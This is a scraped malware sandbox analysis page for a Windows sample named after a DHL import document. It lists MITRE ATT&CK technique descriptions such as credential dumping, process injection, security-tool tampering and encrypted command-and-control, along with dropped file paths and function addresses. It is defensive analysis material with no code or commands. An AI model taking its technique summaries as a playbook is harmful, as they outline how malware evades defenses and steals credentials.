Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL_IMPORT_8236820594.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\0342HZ6P1r

C:\Users\user\AppData\Local\Temp\batchers

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
DHL_IMPORT_8236820594.exe

Function 004E42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 004E42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00522BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 004E2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0052065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 004E344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 004E2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 004E3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 033E2608 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 004E2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 033E23F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138
fileCOMMON

Function 004E3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre